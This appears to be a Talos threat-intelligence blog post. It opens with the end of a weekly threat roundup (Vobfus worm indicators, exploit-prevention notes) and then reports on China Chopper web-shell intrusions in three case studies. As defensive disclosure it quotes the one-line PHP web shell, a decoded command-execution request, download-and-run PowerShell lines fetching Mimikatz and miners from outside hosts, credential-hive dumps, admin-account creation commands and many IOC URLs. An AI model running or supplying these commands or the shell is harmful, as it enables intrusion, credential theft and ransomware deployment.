                  03ab0d4316dba014132279a8fa00672dd72dc52010eca751cca0ceeffee2a940 08728191591ac79aca64917792a74cba2c615487efd3a1194c9bcb774c7a2bbe 0e150456f2a44be79d12adc971076182752864d5c975135609dde6396edf8f92 1650c30e8c7a2441fddc5ae39022d063787d6e9bf31136e7b7a4da058d0e127b 16a955f71500c4b96bb4f3477f295b1e03891e37ed3f15814f3e10e986b41891 2baea5f5924c3797df0292430d7c221c29affc31ac9e892cddce75318cbd4050 38f55600b63cf4b1dead874bb77508dbb367289d4ed39bfa501f38ce6864c561 4529b2919ba158197448b5a407f6399a7ad659aa4b6bfe84a0a69012251957d6 455dda508bbc9bb449541a164536c6ff349036138ace35ecd8b41f328d124868 49328a8570131578e7db5efb056fdfe0918da3022207f6f11fce28cc3ada0dd4 502394f8fd57179a0d32c6c16ec67553841ceb2d2502287ad72b24cf3bbcb940 66c52a00e0bbfc2521431b1093459445abfc410ab365fe18eaa6be4d39b290e5 6a428aa727871fd11bbe5c47c28133042711634b984640e9e61d07281349ebe1 7dc0103c383cbb391561b17c1b5519ff6d742f157d24780b8b89802bf8aeaca8 8b9ffb6981205ab934f0b0014157853099952feb642733dfaf22a36915eaf9e2 8dccacaa54c3735a10c22b876351b6503f5bbc5dec99acd0ac45f72302ea0cc1 8e31d779fb1b41faea824379012dc111909efd6ba6fd22fc3792c42d0d750c30 91a6ff4ea2c0dcefc1afc65a73b0354ebca82938abf16be2fdf5d0260c6a9fae 989193f39f3e95b4451cfd992692dd0e4ae06dd53cbddaacc4cde0e647b6cd26 992956d43b605e5382e17455cfbb08970fd9c95b38bbfda96efb053f4c9212e3 a24985a6f7bff0429bfabf4b0a42f222c152b40669459c068774674c3d156038 adf49cd22dae9ee319da7f8dc03b24eac649f982048b5542f9b377f7beeeb1ac b1a5a9e9ddaec143aae51d0440d040ba98010724046c3a2b97e754d9784aa252 b492b4bbdc6a0661f22678cd3b80430279c29bd0eadbd947c1f44794dc56e99d c10735796a4e90c0266e5c127a0b9ae3361a966c0bc5f1460fb9f3db66a3c519
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Worm.Vobfus-7123957-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR
                  Value Name: Locked
                  12
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
                  Value Name: ShowSuperHidden
                  12
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU 12
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU
                  Value Name: NoAutoUpdate
                  12
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 12
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: fxrab
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: saoavir
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: kiupouv
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: liupiuh
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: juvil
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: xeaoro
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: loxem
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: qetap
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: kauuyom
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: jaoguo
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: reugo
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: meerad
                  1
                  MutexesOccurrences
                  \BaseNamedObjects\A11
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  204[.]11[.]56[.]4811
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  ns1[.]timedate3[.]com11
                  ns1[.]timedate1[.]com11
                  ns1[.]timedate1[.]net11
                  ns1[.]timedate3[.]net11
                  ns1[.]timedate2[.]com11
                  ns1[.]timedate3[.]org11
                  ns1[.]timedate1[.]org11
                  ns1[.]timedate2[.]org11
                  Files and or directories createdOccurrences
                  \autorun.inf12
                  \System Volume Information.exe12
                  \$RECYCLE.BIN.exe12
                  \Secret.exe12
                  \Passwords.exe12
                  \Porn.exe12
                  \Sexy.exe12
                  E:\autorun.inf12
                  E:\$RECYCLE.BIN.exe12
                  E:\Passwords.exe12
                  E:\Porn.exe12
                  E:\Secret.exe12
                  E:\Sexy.exe12
                  E:\System Volume Information.exe12
                  E:\x.mpeg12
                  %HOMEPATH%\Passwords.exe12
                  %HOMEPATH%\Porn.exe12
                  %HOMEPATH%\Secret.exe12
                  %HOMEPATH%\Sexy.exe12
                  \<random, matching '[a-z]{4,7}'>.exe12
                  E:\<random, matching '[a-z]{4,7}'>.exe12
                  %HOMEPATH%\<random, matching '[a-z]{5,7}'>.exe12
                  %HOMEPATH%\RCX<random, matching '[A-F0-9]{3,4}'>.tmp9

                  File Hashes

                  0426c4c36a4793fcbd52f68d1c31620ed0500bc9999c8cae4be03cd7307299d8 7c7a93cc53493be184545ec97e05763dc16dd4fd6aff6da00b7cb3f00091427e cac1b67bfdfc89299cd8720ad33004591bd65fa7eae30ac9b41d8bba158b036c e0d2b56017c438c095800e361ccd7dc27991d0414ce90c0ba9e841220a7c4cc4 e30608735f6e814e40dfd878d4ef1f236660e6ebb4541d6496509493aec5058b f0cf9a4022dbd84685941b3043fd899c4411f9109ea1a09188190705deab8793 f7808bd853e4d50ea09aa31fe8f4c2593391e73f4e73e94a737ae9a074d04abb fca71f3c3fbf6bde78320761bef612e2d7ab278b86e8ae63a70a55708f9600fa fd225f346b89b87ed234350ee6aa8ee61816865b67369d45ac17b8aaf9bacbba fd283c48a116a0f724d0817ae861deb561da5c8890f82dbf1241e9e692730ad6 fd3c422dd572255bac29ff57d36f2fc619d8665ac81c822b12f24d2a338bc3ed fe7a44bb5409772b8386a585c6bdfce47fa978d29cf0203eb9d547490daa776c

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella




                  Exploit Prevention

                  Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
                  Madshi injection detected - (1156)
                  Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
                  CVE-2019-0708 detected - (1075)
                  An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
                  Kovter injection detected - (580)
                  A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                  Process hollowing detected - (526)
                  Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
                  Dealply adware detected - (244)
                  DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
                  Excessively long PowerShell command detected - (214)
                  A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
                  Gamarue malware detected - (53)
                  Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                  Installcore adware detected - (34)
                  Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
                  Atom Bombing code injection technique detected - (25)
                  A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
                  PowerShell file-less infection detected - (15)
                  A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.

                  China Chopper still active 9 years later

                  $
                  0
                  0
                  By Paul Rascagneres and Vanja Svajcer.

                  Introduction

                  Threats will commonly fade away over time as they're discovered, reported on, and detected. But China Chopper has found a way to stay relevant, active and effective nine years after its initial discovery. China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target. Several threat groups have used China Chopper, and over the past two years, we've seen several different campaigns utilizing this web shell and we chose to document three most active campaigns in this blog post.

                  We decided to take a closer look at China Chopper after security firm Cybereason reported on a massive attack against telecommunications providers called "Operation Soft Cell," which reportedly utilized China Chopper. Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017, which shows that even nine years after its creation, attackers are using China Chopper without significant modifications.

                  This web shell is widely available, so almost any threat actor can use. This also means it's nearly impossible to attribute attacks to a particular group using only presence of China Chopper as an indicator.

                  The usage of China Chopper in recent campaigns proves that a lot of old threats never really die, and defenders on the internet need to be looking out for malware both young and old.


                  What is China Chopper?

                  China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool. The web shell works on different platforms, but in this case, we focused only on compromised Windows hosts. China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390, but during our investigation we've seen actors with varying skill levels.

                  In our research, we discovered both Internet Information Services (IIS) and Apache web servers compromised with China Chopper web shells. We do not have additional data about how the web shell was installed, but there are several web application frameworks such as older versions of Oracle WebLogic or WordPress that may have been targeted with known remote code execution or file inclusion exploits.

                  China Chopper provides the actor with a simple GUI that allows them to configure servers to connect to and generate server-side code that must be added to the targeted website code in order to communicate.

                  China Chopper GUI

                  The server-side code is extremely simple and contains, depending on the application platform, just a single line of code. The backdoor supports .NET Active Server Pages or PHP.

                  Here is an example of a server-side code for a compromised PHP application:

                  <?php @eval($_POST['test']);?>

                  We cannot be sure if the simplicity of the server code was a deliberate decision on the part of the China Chopper developers to make detection more difficult, but using pattern matching on such as short snippet may produce some false positive detections.

                  The China Chopper client communicates with affected servers using HTTP POST requests. The only function of the server-side code is to evaluate the request parameter specified during the configuration of the server code in the client GUI. In our example, the expected parameter name is "test." The communication over HTTP can be easily spotted in the network packet captures.

                  China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of 'netstat an|find "ESTABLISHED."' and it is very likely that this command will be seen in process creation logs on affected systems.

                  China Chopper's first suggested Terminal command

                  When we analyze the packet capture, we can see that the parameter "test" contains another eval statement.

                  Depending on the command, the client will submit a certain number of parameters, z0 to zn. All parameters are encoded with a standard base64 encoder before submission. Parameter z0 always contains the code to parse other parameters, launch requested commands and return the results to the client.

                  test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

                  Encoded China Chopper POST request with parameters

                  In this request, the decoded parameters are:
                  z0 - @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
                  ret={$ret}
                  ":"";;echo("|<-");die();

                  z1 - cmd

                  z2 - cd /d "C:\xampp\htdocs\dashboard\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]

                  The end of the command "&echo [S]&cd&echo [E]" seems to be present in all virtual terminal requests and may be used as a reliable indicator to detect China Chopper activity in packet captures or behavioral logs.

                  Apart from the terminal, China Chopper includes a file manager (with the ability to create directories, download files and change file metadata), a database manager and a rudimentary vulnerability scanner.

                  What follows is our view into three different compromises, each with different goals, tools, techniques and likely different actors.

                  Timeline of the observed case studies

                  Case study No. 1: Espionage context

                  We identified the usage of China Chopper in a couple of espionage campaigns. Here, we investigate a campaign targeting an Asian government organization. In this campaign, China Chopper was used in the internal network, installed on a few web servers used to store potentially confidential documents.

                  The purpose of the attacker was to obtain documents and database copies. The documents were automatically compressed using WinRAR:

                  cd /d C:\Windows\Working_Directory\
                  renamed_winrar a -m3 -hp19_Characters_Complex_Password -ta[date] -n*.odt -n*.doc -n*.docx -n*.pdf -n*.xls -n*.xlsx -n*.ppt -n*.pptx -r c:\output_directory\files.rar c:\directory_to_scan\

                  This command is used to create an archive containing documents modified after the date put as an argument. The archives are protected with a strong password containing uppercase, lowercase and special characters. The passwords were longer than 15 characters.

                  We assume the attacker ran this command periodically in order to get only new documents and minimize the quantity of exfiltrated data.

                  On the same target, we identified additional commands executed with China Chopper using WinRAR:

                  rar a -inul -ed -r -m3 -taDate -hp<profanity> ~ID.tmp c:\directory_to_scan

                  China Chopper is a public hacking tool and we cannot tell if in this case the attacker is the same actor as before. But the rar command line here is sufficiently different to note that it could be a different actor. The actor used an offensive phrase for a password, which is why we've censored it here.

                  The attacker deployed additional tools to execute commands on the system:

                  C:\windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\windows\temp\Document.csproj  /p:AssemblyName=C:\windows\temp\downloader.png /p:ScriptFile=C:\windows\temp\downloader.dat /p:Key=27_characters_key > random.tmp

                  MSBuild.exe is used to compile and execute a .NET application with two arguments: the ScriptFile argument contains a PowerShell script encrypted with the value of the key argument. Here is the .NET code:

                  .NET loader code

                  The .NET loader supports encrypted files or URLs as the script argument. If the operator uses an HTTP request, the loader downloads the payload with one of the hardcoded User-Agents. The loader decrypts the downloaded file and executes it:

                  Hardcoded User-Agent strings

                  In our case, the purpose of the decrypted payload was to perform a database dump:

                  powershell.exe -exe bypass -nop -w hidden -c Import-Module C:\windows\help\help\helper.ps1;
                  Run-MySQLQuery -ConnectionString 'Server=localhost;Uid=root;Pwd=;database=DBName;
                  Convert Zero Datetime=True' -Query 'Select * from table where UID > 'Value' -Dump

                  The "where UID" condition in the SQL query has the same purpose as the date in the previous WinRAR command. We assume the attacker performs the query periodically and does not want to dump the entire database, but only the new entries. It is interesting to see that after dumping the data, the attacker checks if the generated file is available and if it contains any data:

                  dir /O:D c:\working_directory\db.csv
                  powershell -nop -exec bypass Get-Content "c:\working_directory\db.csv" | Select-Object -First 10

                  How are the file archives and the database dumps exfiltrated? Since the targeted server is in an internal network, the attacker simply maps a local drive and copies the file to it.

                  cd /d C:\working_directory\
                  net use \192.168.0.10\ipc$ /user:USER PASSWORD
                  move c:\working_directory\db.csv \192.168.0.10\destination_directory

                  The attacker must have access to the remote system in order to exfiltrate data. We already saw the usage of a HTTP tunnel tool to create a network tunnel between the infected system and a C2 server.

                  Case No. 2: Multi-purpose campaign

                  We observed another campaign targeting an organisation located in Lebanon. While our first case describes a targeted campaign with the goal to exfiltrate data affecting internal servers, this one is the opposite: an auxiliary public web site compromised by several attackers for different purposes.

                  We identified actors trying to deploy ransomware on the vulnerable server using China Chopper. The first attempt was Sodinokibi ransomware:

                  certutil.exe -urlcache -split -f hxxp://188.166.74[.]218/radm.exe C:\Users\UserA\AppData\Local\Temp\radm.exe

                  The second delivered the Gandcrab ransomware:

                  If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){ 
                  Start-Process -FilePath "$Env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -argument "IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33'));
                  Invoke-ACAXGZFTTDUDKY;
                  Start-Sleep -s 1000000;"
                  } else {
                  IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33'));
                  Invoke-ACAXGZFTTDUDKY;
                  Start-Sleep -s 1000000;
                  }

                  Here is the script hosted on Pastebin:

                  Reflective loader downloaded from pastebin.com

                  The script executes a hardcoded PE file located — Gandcrab —at the end of the script using a reflective DLL-loading technique.

                  In addition to the ransomware, we identified another actor trying to execute a Monero miner on the vulnerable server with China Chopper:

                  Powershell -Command -windowstyle hidden -nop -enc -iex(New-Object Net.WebClient).DownloadString('hxxp://78.155.201[.]168:8667/6HqJB0SPQqbFbHJD/init.ps1')

                  Here's a look at the miner configuration:

                  Monero miner configuration

                  Some of the detected activity may have been manual and performed in order to get OS credentials.

                  Trying to get the registry:

                  reg save hklm\sam sam.hive 
                  reg save hklm\system system.hive
                  reg save hklm\security security.hive

                  Using Mimikatz (with a few hiccups along the way):

                  powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
                  Invoke-Mimikatz >>c:\1.txt

                  powershell IEX","(New-Object","Net.WebClient).DownloadString('hxxp://is[.]gd/oeoFuI'); Invoke-Mimikatz -DumpCreds

                  C:\Windows\System32WindowsPowerShell\v1.0\powershell.exe IEX 

                  (New-Object","Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
                  Invoke-Mimikatz

                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [Environment]::Is64BitProcess

                  powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
                  Invoke-Mimikatz >>c:\1.txt

                  Attempting to dump password hashes using a PowerShell module and the command line:

                  IEX (New-Object 

                  Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Get-PassHashes.ps1');Get-PassHashes;

                  The attackers also tried procdump64.exe on lsass.exe to get the local credentials stored in memory. In addition to the multiple attempts to dump the credential, the attackers had to deal with typos: missed spaces, wrong commands or letters switching.

                  One of the actors successfully acquired the credentials and tried to pivot internally by using the credentials and the "net use" commands.

                  Finally, several remote access tools such as Gh0stRAT and Venom multi-hop proxy were deployed on the machine, as well as a remote shell written purely in PowerShell.

                  Case No. 3: Web hosting providers compromised

                  In one campaign, we discovered an Asian web-hosting provider under attack, with the most significant compromise spanning several Windows servers over a period of 10 months. Once again, we cannot be sure if this was a single actor or multiple groups, since the activities differ depending on the attacked server. We show just a subset of observed activities.

                  Server 1

                  Generally, the attackers seek to create a new user and then add the user to the group of users with administrative privileges, presumably to access and modify other web applications hosted on a single physical server.

                  cd /d C:\compromisedappdirectory&net user user pass /add
                  cd /d C:\compromisedappdirectory&net localgroup administrattors user /add

                  Notice the misspelling of the word "administrators." The actor realizes that the addition of the user was not successful and attempts a different technique. They download and install an archive containing executables and trivially modified source code of the password-stealing tool "Mimikatz Lite" as GetPassword.exe.

                  The tool investigates the Local Security Authority Subsystem memory space in order to find, decrypt and display retrieved passwords. The only change, compared with the original tool is that actors change the color and the code page of the command window. The color is changed so that green text is displayed on a black background and the active console code page is changed to the Chinese code page 936.

                  Finally, the actor attempts to dump the database of a popular mobile game "Clash of Kings," possibly hosted on a private server.

                  Server 2

                  An actor successfully tested China Chopper on a second server and stopped the activity. However, we also found another Monero cryptocurrency miner just as we found commodity malware on other systems compromised with China Chopper.

                  The actors first reset the Access Control List for the Windows temporary files folder and take ownership of the folder. They then allow the miner executable through the Windows Firewall and finally launch the mining payload.

                  C:\Windows\system32\icacls.exe C:\Windows\Temp /Reset /T
                  C:\Windows\system32\takeown.exe /F C:\Windows\Temp
                  C:\Windows\system32\netsh.exe Firewall Add AllowedProgram C:\Windows\Temp\lsass.eXe Windows Update Enable
                  C:\Windows\Temp\lsass.eXe

                  Server 3

                  The attack on this server starts by downloading a number of public and private tools, though we were not able to retrieve them.

                  The actor attempts to exploit CVE-2018–8440— an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit.

                  cd /d C:\directoryofcompromisedapp&rundll32 C:\directoryofcompromisedapp\ALPC-TaskSched-LPE.dll,a

                  The attacker launches several custom tools and an available tool that attempts to create a new user iis_uses and change DACLs to allow the users to modify certain operating system objects.

                  The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server. This is likely done to compromise other sites or to run a web defacement campaign.

                  cacls \. C:\path_to_a_website /T /E /C /G Everyone:F

                  Finally, the actor attempts to launch Powershell Mimikatz loader to get more credentials from memory and save the credentials into a text file:

                  powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz|Out-File
                  -Encoding ASCII outputfile.txt

                  Server 4

                  The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server.

                  Once the privilege escalation was successful, the actor adds a new user account and adds the account to the administrative group.

                  net user admin admin /ad
                  net localgroup administrators admin /ad

                  The attacker next logs on to the server with a newly created user account and launches a free tool replacestudio32.exe, a GUI utility that easily searches through text-based files and performs replacement with another string. Once again, this could be used to affect all sites hosted on the server or simply deface pages.

                  Conclusion

                  Insecure web applications provide an effective entry point for attackers and allow them to install additional tools such as web shells, conduct reconnaissance and pivot to other systems.

                  Although China Chopper is an old tool, we still see it being used by attackers with various goals and skill levels and in this post we showed some of the common tools, techniques and processes employed in three separate breaches. Because it is so easy to use, it's impossible to confidently connect it to any particular actor or group.

                  In our research we documented three separate campaigns active over a period of several months. This corroborates the claim that an average time to detect an intrusion is over 180 days and implies that defenders should approach building their security teams and processes around an assumption that the organization has already been breached. It is crucial that an incident response team should have a permission to proactively hunt for breaches, not only to respond to alerts raised by automated detection systems or escalated by the first line security analysts.

                  When securing the infrastructure it is important to keep internal as well as external facing web servers, applications, and frameworks up to date with the latest security patches to mitigate risk of compromise with already known exploits.

                  Despite the age, China Chopper is here to stay, and we will likely see it in the wild going forward.

                  Coverage

                  Intrusion prevention systems such as SNORT® provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

                  Additional ways our customers can detect and block these threats are listed below.



                  Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                  Email Security can block malicious emails sent by threat actors as part of their campaign.

                  Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                  AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                  Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                  Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                  IOCs

                  China Chopper clients

                  9065755708be18d538ae1698b98201a63f735e3d8a597419588a16b0a72c249a
                  c5bbb7644aeaadc69920de9a31042920add12690d3a0a38af15c8c76a90605ef
                  b84cdf5f8a4ce4492dd743cb473b1efe938e453e43cdd4b4a9c1c15878451d07
                  58b2590a5c5a7bf19f6f6a3baa6b9a05579be1ece224fccd2bfa61224a1d6abc

                  Case study 1

                  Files

                  b1785560ad4f5f5e8c62df16385840b1248fe1be153edd0b1059db2308811048 - downloader
                  fe6b06656817e288c2a391cbe8f5c7f1fa0f0849d9446f9350adf7100aa7b447 - proxy
                  28cbc47fe2975fbde7662e56328864e28fe6de4b685d407ad8a2726ad92b79e5 - downloader dll
                  c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e - nbtscan tool
                  dbe8ada2976ee00876c8d61e5a92cf9c980ae4b3fce1d9016456105a2680776c - Miner

                  Legitimate tools

                  d76c3d9bb0d8e0152db37bcfe568c5b9a4cac00dd9c77c2f607950bbd25b30e0 - rar
                  46c3e073daa4aba552f553b914414b8d4419367df63df8a0d2cf4db2d835cdbd - renamed rar
                  96f478f709f4f104822b441ae3fa82c95399677bf433ac1a734665f374d28c84 - renamed rar

                  IP addresses

                  69.165.64.100
                  59.188.255.184
                  154.211.12.153
                  185.234.218.248

                  Case study 2

                  Files

                  02d635f9dfc80bbd9e8310606f68120d066cec7db8b8f28e19b3ccb9f4727570 - Gandcrab loader
                  1c3d492498d019eabd539a0774adfc740ab62ef0e2f11d13be4c00635dccde33 - Gandcrab
                  219644f3ece78667293a035daf7449841573e807349b88eb24e2ba6ccbc70a96 - Miner/dropper
                  4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38 - massscan dropped by the miner
                  a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb - remote exploit
                  919270ef1c58cc032bb3417a992cbb676eb15692f16e608dcac48e536271373a - multihop Venom proxy

                  URLs

                  hxxp://101.78.142.74:8001/xavg/javae[.]exe
                  hxxp://107.181.160.197/win/3p/checking[.]ps1
                  hxxp://107.182.28.64/t0[.]txt
                  hxxp://139.180.199.167:1012/update[.]ps1
                  hxxp://172.96.241.10:80/a
                  hxxp://185.228.83.51/config[.]c
                  hxxp://188.166.74.218/radm[.]exe
                  hxxp://188.166.74.218/untitled[.]exe
                  hxxp://198.13.42.229:8667/6HqJB0SPQqbFbHJD/init[.]ps1
                  hxxp://202.144.193.177/1[.]ps1
                  hxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/init[.]ps1
                  hxxp://78.155.201.168:8667/6HqJB0SPQqbFbHJD/init[.]ps1
                  hxxp://is.gd/oeoFuI
                  hxxps://pastebin.com/raw/Hd7BmJ33
                  hxxps://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz[.]ps1
                  hxxp://fid.hognoob.se/download[.]exe
                  hxxp://107.182.28.64/t0[.]txt
                  hxxp://uio.hognoob.se:63145/cfg[.]ini
                  hxxp://fid.hognoob.se/HidregSvc[.]exe
                  hxxp://188.166.74.218/untitled[.]exe
                  hxxp://45.55.211.79/.cache/untitled[.]exe
                  hxxp://188.166.74.218/untitled[.]exe

                  IP Addresses

                  185.234.218.248

                  Case study 3

                  Files:

                  fe2f0494e70bfa872f1aea3ec001ad924dd868e3621735c5a6c2e9511be0f4b0 - Mini Mimikatz archive
                  2e0a9986214c4da41030aca337f720e63594a75754e46390b6f81bae656c2481 - CVE-2015-0062
                  f3a869c78bb01da794c30634383756698e320e4ca3f42ed165b4356fa52b2c32 - CVE-2015-1701/CVE-2016-0099
                  b46080a2446c326cc5f574bdd34e20daad169b535adfda97ba83f31a1d0ec9ab - a tool for adding and elevating a user
                  ab06f0445701476a3ad1544fbea8882c6cb92da4add72dc741000bc369db853f - ACLs editing for defaced sites

